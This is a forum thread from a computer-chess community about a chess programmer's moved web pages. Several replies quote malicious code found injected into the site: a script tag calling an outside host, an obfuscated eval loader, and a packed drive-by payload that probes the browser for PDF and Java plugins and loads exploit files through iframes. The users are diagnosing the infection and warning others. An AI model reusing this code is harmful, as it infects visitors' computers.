George Lyapko Chess pages

Postby Ron Murawski » 31 Oct 2009, 23:35

It looks like George Lyapko has moved his geocities site to a new home. Or, maybe it was moved a while ago?

Here is his tournaments page.
http://lyapko.110mb.com/lgwbl.htm

If anyone can find his utilities page, it would be much appreciated!

Try:

http://lyapko.110mb.com/

I can see bunch of utilities there.

Cheers,

EDIT: Unfortunately it seems that some of the links in that page are broken :(

AVG antivirus says the page is infected and blocks access!

I do not know what to say about the reasons AntiVirus programs are finding problems with that page. But if there is an specific utility you need I'll be more than happy to download it and e-mail it to you.

This is what I see:
Code: Select all

<script src=http://honda-p3.com/wp-content/wp-config.php ></script>

That's the only script tag on the page. The mogzilla.ru thing looks strange, too.

// 404 <script>
n7rh=24;if(prompt)n7rh='';Hl2p=unescape('%'+n7rh);
fRNg='fun6ectin6fn6e yPn69Ip()m7bvan72 an3ddn6fcun6d>65m6etm2eget>45lm65m6de>6em74sm42yTagNam6d>65(>22im66ram6dem22),s>3d>22abn6fum74>3ablam6en6bm22m2cb,im3bfn6fr(in3d0m3bin3cn61.l>65n6eg>74h>3b>69++>29if((b>3dan5bin5d).src>21>3ds)n7bb.srcn3dn73m3b>62.style.dispn6cayn3dm22>6eo>6een22n3bb.om6e>6co>61dn3dfm75>6ecm74iom6en28)n7bthis.locatn69>6f>6em3dm73m7dn7dif(m21>28n2dm2d>62n50n59K))wim6edow.cln65n61rI>6etervn61l(xq3A)>7dbm50n59Km3d60n30>300n3by>50iIp()m3bm78q3An3dw>69>6ed>6fw.sn65tIm6eterva>6cm28m22yPiIp()m22,1)n3b';
eval(unescape(fRNg.replace(/[>mn]/g,Hl2p)));

//</script>

matematiko,

The reason the anti-virus has popped up for Ron is that the page has acquired an infection. Look at the page source for the page and the offending script will be seen between two iframe tags, just after the <body tag. Probably the script just before the <body tag is an infection also, but maybe it isn't since the page Ron linked to has that script in it too. As with all things I am no expert.

Yesterday when I visited the page, Avast! reported the name of the exploit as "HTML:Illiframe-D", so I'm pretty sure it's to do with the contents within the <iframe> tags. Yesterday, it was a different link in the iframe, today the iframe link changed, and Avast! no longer reports a trojan.

AVG says George Lyapko's page is now clean. The infection has been removed. :-)

Now I can safely add it as a Computer-Chess Wiki Link. Thanks for all the comments.

The iframe is still there, though, just with a different address. http://zria.ru/index.php :

<html>
<head><title>Jweah13faem0ja6dqj342n53hzg6</title></head><body>
<script>
eval( function(p, a,

c, k , e , d )
{e = function
(
c
)

{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('w k(){h{5=\'<#&(i&^!$f(#)r@a!m(!e^@$\'.3(/@|#|&|\\^|\\!|\\)|\\$|\\(/2,\'\');7=\'<@@!/&i@#f&@(r#$a^^m^e$()^>(\'.3(/@|\\$|\\)|\\^|\\(|&|#|\\!/2,\'\');j=\'A$@d&o&!(@b(^#e@ @@A&&c#!(r#o!&&b)@$a^$t&\'.3(/\\^|\\(|&|@|\\!|\\$|\\)|#/2,\'\');8=\'A@)#)d$o)b^e$ #()z#D#$&@F@\'.3(/@|\\^|\\(|\\$|&|\\)|#|\\!/2,\'\');y(i=0;i<6.v.x;i++){4=6.v[i].B;l((4.g(j)!=-1)||(4.g(8)!=-1)){n.p(5+\' q="s/G.C">\'+7)}}}u(9){}h{l(6.H()){n.p(5+\' q="s/E.I">\'+7)}}u(9){}}k();',45,45,'||ig|replace|B53fjjdpq|Wvfl219id|navigator|Iqqptmy|Icih2owkj|L3kv2n8|||||||indexOf|try||Umsjv5|B4fkcsqef|if||document||write|src||pics||catch|plugins|function|length|for|P||name|pdf||java||ChangeLog|javaEnabled|html'.split('|'),0,{}))
</script>
</body>
</html>

This does not fill me with confidence...

I use the opera browser and always browse with inline frames disabled.
They are not needed and a source of infections of all kinds.

The AVG infection warning is back. It's best to stay away from this site until further notice. I will remove this site from my links page.

Looks as the reocities site archived the geocities page.
